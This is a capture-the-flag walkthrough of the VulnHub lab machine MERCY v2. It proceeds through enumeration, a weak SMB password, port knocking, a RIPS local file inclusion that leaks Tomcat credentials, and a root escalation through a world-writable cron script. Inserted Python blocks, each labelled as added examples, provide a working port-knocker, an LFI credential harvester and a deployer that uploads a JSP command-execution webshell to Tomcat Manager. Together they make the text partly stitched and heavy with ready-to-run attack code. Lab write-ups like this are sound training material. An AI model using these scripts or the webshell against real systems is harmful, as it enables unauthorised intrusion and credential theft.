MERCY v2 Writeup - VulnHub

Welcome to the writeup of MERCY, a machine dedicated to Offensive Security for the PWK course, and to a great friend of the author.

Pedro Mariano
4 min

Welcome to the writeup of MERCY v2, a machine that can be found on VulnHub.

Name: digitalworld.local: MERCY v2
Release date: 28 Dec 2018
Author: Donavan
Series: digitalworld.local
Description: MERCY is a machine dedicated to Offensive Security for the PWK course, and to a great friend of mine who was there to share my sufferance with me. :-)
MERCY is a name-play on some aspects of the PWK course. It is NOT a hint for the box.

This machine was deployed using VirtualBox with "Host-Only Adapter" configuration.



NMAP

nmap -v -sSV -p 22,53,80,110,139,143,445,993,995,8080 -Pn 192.168.56.101 -T4 -oA nmap/sSV

PORT     STATE    SERVICE     VERSION
22/tcp   filtered ssh
53/tcp   open     domain      ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
80/tcp   filtered http
110/tcp  open     pop3        Dovecot pop3d
139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open     imap        Dovecot imapd (Ubuntu)
445/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp  open     ssl/imap    Dovecot imapd (Ubuntu)
995/tcp  open     ssl/pop3    Dovecot pop3d
8080/tcp open     http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 08:00:27:A2:16:1C (Oracle VirtualBox virtual NIC)
Service Info: Host: MERCY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Identified a web page on port 8080 (http://192.168.56.101:8080/) running Apache Tomcat.

Used the Gobuster tool to find some interesting directories:

GOBUSTER

gobuster dir -u http://192.168.56.101:8080/ -w /usr/share/wordlists/dirb/big.txt -e -s "200,301,302,401"

===============================================================
http://192.168.56.101:8080/docs                 (Status: 302) [Size: 0] [--> http://192.168.56.101:8080/docs/]
http://192.168.56.101:8080/examples             (Status: 302) [Size: 0] [--> http://192.168.56.101:8080/examples/]
http://192.168.56.101:8080/manager              (Status: 302) [Size: 0] [--> http://192.168.56.101:8080/manager/] 
http://192.168.56.101:8080/robots.txt           (Status: 200) [Size: 45]                                          
                                                                                                                  
===============================================================

The /robots.txt file pointed to the page /tryharder/tryharder, which holds a base64-encoded message (not a hash) that decodes to the following:


It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting silly passwords that will get cracked with any decent password list.

Once, we found the password "password", quite literally sticking on a post-it in front of an employee's desk! As silly as it may be, the employee pleaded for mercy when we threatened to fire her.
No fluffy bunnies for those who set insecure passwords and endanger the enterprise.

At this point this finding didn't mean much on its own, but any information can be important!

Continuing with the enumeration, it was possible to identify some shared folders through SMB.


But there was nothing to get as the anonymous user...

With the enum4linux tool it was possible to enumerate some users:

enum4linux -a 192.168.56.101

[...]
S-1-22-1-1000 Unix User\pleadformercy (Local User)
S-1-22-1-1001 Unix User\qiu (Local User)
S-1-22-1-1002 Unix User\thisisasuperduperlonguser (Local User)
S-1-22-1-1003 Unix User\fluffy (Local User)

The qiu user caught my attention because there is an SMB share with this name.

Following the "little poem" from /tryharder/tryharder (I think that warning didn't work haha D:), I got access to the qiu SMB share using the following credentials:

qiu:password

With that I logged into SMB and found some interesting folders and files.


After downloading the files and reading them I found a gem in the .private/config file: a port-knocking configuration that opens and closes the following ports: 22 and 80.


As listed in the first scan, ports 22 and 80 were filtered. By knocking in the port sequences given in the screenshot above (.private/config), one sequence per port, we can change the state of those ports and interact with them. Particularly, it's a pretty cool feature.

Used hping3 to send one SYN per port of each sequence:

hping3 -S -p 159 -c 1 192.168.56.101; hping3 -S -p 27391 -c 1 192.168.56.101; hping3 -S -p 4 -c 1 192.168.56.101

hping3 -S -p 17301 -c 1 192.168.56.101; hping3 -S -p 28504 -c 1 192.168.56.101; hping3 -S -p 9999 -c 1 192.168.56.101

After that the ports were open:
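The same knock done in Python, as an added example that is not part of the original writeup. It parses a knockd-style config (the format .private/config is written in) and replays each "open" sequence with one TCP SYN per port, which is all knockd looks for. The config text embedded below is constructed: the port numbers are the ones knocked with hping3 above, but the section names, timeouts and iptables commands are assumptions, not the contents of the file found on the box.

```python
"""Parse a knockd-style config and replay its knock sequences (added example)."""
import configparser
import socket
import sys
from typing import Dict, List

# Constructed sample in knockd.conf syntax. The port numbers are the ones
# knocked with hping3 above; section names, timeouts and iptables commands are
# assumptions, not the contents of the .private/config file from the box.
SAMPLE_KNOCKD_CONF = """
[options]
    logfile = /var/log/knockd.log

[openSSH]
    sequence    = 159,27391,4
    seq_timeout = 100
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[openHTTP]
    sequence    = 17301,28504,9999
    seq_timeout = 100
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
    tcpflags    = syn
"""


def parse_sequences(conf_text: str) -> Dict[str, List[int]]:
    """Return {section: [port, ...]} for every section with a 'sequence' key.

    knockd also accepts entries such as '7000:udp'; the protocol suffix is
    dropped because this helper only knocks with TCP SYNs.
    """
    cp = configparser.ConfigParser(interpolation=None)  # keep %IP% literal
    cp.read_string(conf_text)
    sequences = {}
    for section in cp.sections():
        if cp.has_option(section, "sequence"):
            ports = [int(item.strip().split(":")[0])
                     for item in cp.get(section, "sequence").split(",")]
            sequences[section] = ports
    return sequences


def knock(host: str, ports: List[int], timeout: float = 0.5) -> int:
    """Send one TCP SYN per port, in order, and return how many were sent.

    connect_ex() makes the kernel emit the SYN; knockd sniffs that SYN, so a
    refused or timed-out connection is still a valid knock. The ports must be
    hit in order within knockd's seq_timeout window.
    """
    sent = 0
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect_ex((host, port))  # result ignored: only the SYN matters
            sent += 1
    return sent


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.56.101"
    for name, seq in parse_sequences(SAMPLE_KNOCKD_CONF).items():
        if name.startswith("open"):
            print(f"{name}: knocking {seq} on {target}")
            knock(target, seq)
```

Run it with the target IP as its only argument, then re-scan ports 22 and 80 with nmap to confirm they changed state.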

nmap -v -sSV -p 22,80 -Pn 192.168.56.101 -T4 -oN nmap/sSV-APKnock

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 08:00:27:A2:16:1C (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Accessing the web page on port 80, a loving message is observed o.o


Running Gobuster again, this time against port 80, I found 2 interesting pages:

gobuster dir -u http://192.168.56.101/ -w /usr/share/wordlists/dirb/big.txt -e -s "200,301,302,401"

===============================================================
http://192.168.56.101/.htpasswd            (Status: 403) [Size: 290]
http://192.168.56.101/.htaccess            (Status: 403) [Size: 290]
http://192.168.56.101/robots.txt           (Status: 200) [Size: 50] 
http://192.168.56.101/server-status        (Status: 403) [Size: 294]
http://192.168.56.101/time                 (Status: 200) [Size: 79] 
                                                                    
===============================================================

Below are screenshots of the pages:

  • /time

Is this information pulled directly from the system?

  • /robots.txt

As we can see at /robots.txt, we have 2 more pages:

  • /mercy
  • /nomercy

The last one hosts RIPS 0.53, a "static source code analyser for vulnerabilities in PHP web applications", and there is a public exploit for the "Multiple Local File Inclusions" vulnerability that exists in that version.

Through this vulnerability I read the /etc/passwd file, which confirmed the LFI and, as a bonus, the users enumerated earlier :p


http://192.168.56.101/nomercy/windows/code.php?file=../../../../../../../etc/passwd

As identified at the beginning, there is a Tomcat server, and its default index page revealed the installation path. The LFI was then used to pull the Tomcat credentials, which are normally kept in conf/tomcat-users.xml:


http://192.168.56.101/nomercy/windows/code.php?file=../../../../../var/lib/tomcat7/conf/tomcat-users.xml
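A small helper around this LFI, added here as an example (it is not code from the writeup or from RIPS): it builds the traversal URL for any absolute path, undoes the viewer's HTML wrapping, lists the accounts with a login shell from /etc/passwd, and pulls user/password/roles entries out of tomcat-users.xml while skipping the commented-out examples that ship in Tomcat's default file. The two sample documents inside are constructed: the user names and the two credential pairs are the ones found on the box, but the HTML wrapping (a span, `<br />` line breaks, escaped entities) is an assumption about how code.php renders a file, and fluffy's role is made up.

```python
"""Helpers for the RIPS 0.53 LFI (added example): URL building and parsing
of the files it discloses."""
import html
import re
import urllib.request
from typing import Dict, List
from urllib.parse import quote

BASE = "http://192.168.56.101/nomercy/windows/code.php"  # vulnerable viewer

# Constructed /etc/passwd excerpt (user names from the enum4linux output).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
pleadformercy:x:1000:1000:,,,:/home/pleadformercy:/bin/bash
qiu:x:1001:1001:,,,:/home/qiu:/bin/bash
thisisasuperduperlonguser:x:1002:1002:,,,:/home/thisisasuperduperlonguser:/bin/bash
fluffy:x:1003:1003:,,,:/home/fluffy:/bin/bash
"""

# Constructed tomcat-users.xml as the viewer might render it: entity-encoded
# text in a <span>, <br /> for newlines, &nbsp; for indentation (an assumption
# about code.php's output). The two credential pairs are the ones found on the
# box; fluffy's role is invented; the commented-out 'tomcat' user is Tomcat's
# stock example and must be ignored.
SAMPLE_TOMCAT_USERS_PAGE = (
    '<span style="color: #000000">'
    '&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;<br />'
    '&lt;tomcat-users&gt;<br />'
    '&lt;!--<br />'
    '&nbsp;&nbsp;&lt;user username=&quot;tomcat&quot; password=&quot;s3cret&quot; roles=&quot;manager-gui&quot;/&gt;<br />'
    '--&gt;<br />'
    '&nbsp;&nbsp;&lt;role rolename=&quot;manager-gui&quot;/&gt;<br />'
    '&nbsp;&nbsp;&lt;user username=&quot;thisisasuperduperlonguser&quot; '
    'password=&quot;heartbreakisinevitable&quot; roles=&quot;manager-gui&quot;/&gt;<br />'
    '&nbsp;&nbsp;&lt;user username=&quot;fluffy&quot; password=&quot;freakishfluffybunny&quot; roles=&quot;none&quot;/&gt;<br />'
    '&lt;/tomcat-users&gt;<br />'
    '</span>'
)


def lfi_url(path: str, depth: int = 7, base: str = BASE) -> str:
    """Traversal URL for an absolute path. Extra ../ beyond / is harmless,
    so overshooting the depth is the safe default."""
    rel = "../" * depth + path.lstrip("/")
    return base + "?file=" + quote(rel)


def fetch(url: str, timeout: float = 10) -> str:
    """GET the page (network; not exercised offline)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def viewer_to_text(page: str) -> str:
    """Undo the viewer's HTML: <br> back to newlines, span tags dropped,
    entities decoded, &nbsp; back to spaces. Plain text passes through."""
    text = re.sub(r"<br\s*/?>", "\n", page)
    text = re.sub(r"</?span[^>]*>", "", text)
    return html.unescape(text).replace("\xa0", " ")


def login_users(passwd_text: str) -> List[str]:
    """Accounts with a real login shell (system accounts end in nologin/false)."""
    users = []
    for line in viewer_to_text(passwd_text).splitlines():
        parts = line.split(":")
        if len(parts) == 7 and not parts[6].endswith(("nologin", "false")):
            users.append(parts[0])
    return users


def tomcat_credentials(page: str) -> Dict[str, Dict[str, str]]:
    """{username: {password, roles}} from tomcat-users.xml, ignoring the
    commented-out examples in Tomcat's default file."""
    text = re.sub(r"<!--.*?-->", "", viewer_to_text(page), flags=re.S)
    creds = {}
    for attrs in re.findall(r"<user\b([^>]*?)/?>", text):
        kv = dict(re.findall(r'(\w+)\s*=\s*"([^"]*)"', attrs))
        if "username" in kv:
            creds[kv["username"]] = {"password": kv.get("password", ""),
                                     "roles": kv.get("roles", "")}
    return creds


if __name__ == "__main__":
    print(login_users(fetch(lfi_url("/etc/passwd"))))
    print(tomcat_credentials(fetch(lfi_url("/var/lib/tomcat7/conf/tomcat-users.xml"))))
```

The roles column is worth reading as carefully as the password: only manager-gui lets you into the HTML manager, and only manager-script lets you drive the text/scripting interface.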

With these credentials I logged into the Tomcat Manager as an administrator, and with those permissions it is possible to upload and deploy anything.


To get a reverse shell we could use the WAR upload function in Tomcat Manager, but Metasploit makes it easier...

Used exploit/multi/http/tomcat_mgr_upload to exploit it and establish a reverse shell:

set HttpPassword heartbreakisinevitable
set HttpUsername thisisasuperduperlonguser
set RHOSTS 192.168.56.101
set RPORT 8080
set LHOST 192.168.56.104
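An alternative to the Metasploit module, added as an example (not the writeup's code): build a WAR holding a small JSP command runner and PUT it to the Manager's text interface with the recovered credentials. The text interface needs the manager-script role, while the HTML form that the msf module drives needs manager-gui; the roles of thisisasuperduperlonguser are not shown on this page, so that is the first thing to check if the deploy comes back 403. The context path /shell and the JSP file name are assumptions.

```python
"""Deploy a JSP command runner via the Tomcat Manager text interface (added example)."""
import base64
import io
import urllib.request
import zipfile
from typing import List

TARGET = "http://192.168.56.101:8080"  # Tomcat from the nmap scan
USER, PASSWORD = "thisisasuperduperlonguser", "heartbreakisinevitable"  # from tomcat-users.xml

# Minimal JSP: runs ?cmd=... with /bin/sh and streams stdout back.
CMD_JSP = r"""<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", cmd});
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) { out.println(line); }
}
%>
"""

# Servlet 3.0 descriptor; Tomcat 7 would also accept a WAR without one.
WEB_XML = ('<?xml version="1.0" encoding="UTF-8"?>\n'
           '<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0"/>\n')


def build_war(jsp_name: str = "cmd.jsp", jsp_source: str = CMD_JSP) -> bytes:
    """Return a WAR (a zip) with the JSP at its root and a web.xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr(jsp_name, jsp_source)
        z.writestr("WEB-INF/web.xml", WEB_XML)
    return buf.getvalue()


def war_entries(war: bytes) -> List[str]:
    """File names inside a WAR; a sanity check before uploading."""
    with zipfile.ZipFile(io.BytesIO(war)) as z:
        return sorted(z.namelist())


def basic_auth(user: str, password: str) -> str:
    """Authorization header value; the Manager uses HTTP Basic auth."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def deploy_url(path: str, target: str = TARGET) -> str:
    """Text-interface deploy endpoint; update=true allows redeploying."""
    return f"{target}/manager/text/deploy?path={path}&update=true"


def deploy(war: bytes, path: str = "/shell", target: str = TARGET,
           user: str = USER, password: str = PASSWORD) -> str:
    """PUT the WAR (network; needs the manager-script role). Tomcat answers
    'OK - Deployed application at context path /shell' on success."""
    req = urllib.request.Request(deploy_url(path, target), data=war, method="PUT")
    req.add_header("Authorization", basic_auth(user, password))
    req.add_header("Content-Type", "application/octet-stream")
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode()


if __name__ == "__main__":
    war = build_war()
    print(war_entries(war))
    print(deploy(war))
    print(f"now try: {TARGET}/shell/cmd.jsp?cmd=id")
```

Once deployed, /shell/cmd.jsp?cmd=id runs as the Tomcat service user, which is the same foothold the Metasploit session gives; from there a reverse shell is one more cmd= away.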


Spoiler: thisisasuperduperlonguser's home directory is a troll D:


Privilege Escalation

Not many leads besides some users' /home directories, but the credentials found in tomcat-users.xml worked to switch to the fluffy user: fluffy:freakishfluffybunny. An interactive shell was needed first, and python was used for that.


Now as the fluffy user, there are secrets and interesting things in the home directory: ~/.private/secrets

fluffy@MERCY:~/.private/secrets$ ls -la
ls -la
total 20
drwxr-xr-x 2 fluffy fluffy 4096 Nov 20  2018 .
drwxr-xr-x 3 fluffy fluffy 4096 Nov 20  2018 ..
-rwxr-xr-x 1 fluffy fluffy   37 Nov 20  2018 backup.save
-rw-r--r-- 1 fluffy fluffy   12 Nov 20  2018 .secrets
-rwxrwxrwx 1 root   root    222 Nov 20  2018 timeclock
fluffy@MERCY:~/.private/secrets$ cat timeclock
cat timeclock
#!/bin/bash

now=$(date)
echo "The system time is: $now." > ../../../../../var/www/html/time
echo "Time check courtesy of LINUX" >> ../../../../../var/www/html/time
chown www-data:www-data ../../../../../var/www/html/time

The timeclock script writes the /time page we saw before, so it appears to be run automatically; it is owned by root and is world-writable (-rwxrwxrwx)... interesting, isn't it?

So a bash reverse-shell line was appended to the file to connect back to my machine.

Before that, a netcat listener was started on port 6666 to wait for the connection.

After the listener was set up and the file changed, the script ran again and the reverse shell was established as root.


NICE! PWNED!!

Finally we got root and the whole machine is compromised!


Conclusion

This is a really good machine to practice and exercise some base skills, and yet it can make you beg for MERCY xD. I recommend you download it and try it too o/ - if you haven't already...

But of course, I couldn't leave out the author's notes found in the /root directory: the author-secret.txt and proof.txt files.

root@MERCY:~# cat author-secret.txt
cat author-secret.txt
Hi! Congratulations on being able to root MERCY.

The author feels bittersweet about this box. On one hand, it was a box designed as a dedication to the sufferance put through by the Offensive Security team for PWK. I thought I would pay it forward by creating a vulnerable machine too. This is not meant to be a particularly difficult machine, but is meant to bring you through a good number of enumerative steps through a variety of techniques.

The author would also like to thank a great friend who he always teases as "plead for mercy". She has been awesome. The author, in particular, appreciates her great heart, candour, and her willingness to listen to the author's rants and troubles. The author will stay forever grateful for her presence. She never needed to be this friendly to the author.

The author, as "plead for mercy" knows, is terrible at any sort of dedication or gifting, and so the best the author could do, I guess, is a little present, which explains the hostname of this box. (You might also have been pleading for mercy trying to root this box, considering its design.)

You'll always be remembered, "plead for mercy", and Offensive Security, for making me plead for mercy!

Congratulations, once again, for you TRIED HARDER!

Regards,
The Author


root@MERCY:~# cat proof.txt
cat proof.txt
Congratulations on rooting MERCY. :-)

Thanks for reading and feel free to pingback a coffee ;D
